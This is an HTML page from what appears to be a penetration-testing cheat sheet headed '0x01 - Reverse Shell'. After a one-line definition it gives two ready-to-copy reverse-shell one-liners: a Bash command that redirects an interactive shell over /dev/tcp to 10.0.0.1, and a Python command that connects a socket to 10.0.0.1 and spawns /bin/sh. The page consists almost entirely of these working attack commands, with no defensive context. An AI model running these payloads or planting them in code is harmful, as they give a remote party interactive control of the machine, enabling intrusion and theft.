<!-- Begin page content -->
<main class="flex-shrink-0">
    <div class="container">
        <div class="row">
            <h1 class="mt-5">0x01 - Reverse Shell</h1>
            <hr>
            <p class="lead">
                A reverse shell is a shell session established on a connection that is initiated from a <code>remote machine</code>, not from the local host.
            </p>
        </div>
        <br><br>
        <div class="row">
            <h2>Bash</h2>
            <hr>

            <div class="window_container">
                <div class="window_content">
                    <div class="window_top">
                        <span class="window_dot bg-danger"></span>
                        <span class="window_dot bg-warning"></span>
                        <span class="window_dot bg-success"></span>
                        <span class="window_title">Id</span>
                    </div>
                    <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token info punctuation">pentest@x65[/home]</span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash"><span class="token function">bash -i >& /dev/tcp/10.0.0.1/8080 0>&1</span></span></span><span class="token output"></span></code></pre></div>
            </div>
        </div>
        <br><br>
        <div class="row">
            <h2>Python</h2>
            <hr>

            <div class="window_container">
                <div class="window_content">
                    <div class="window_top">
                        <span class="window_dot bg-danger"></span>
                        <span class="window_dot bg-warning"></span>
                        <span class="window_dot bg-success"></span>
                        <span class="window_title">Id</span>
                    </div>
                    <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token info punctuation">pentest@x65[/home]</span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash"><span class="token function">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span></span></span><span class="token output"></span></code></pre></div>
            </div>
        </div>
    </div>
</main>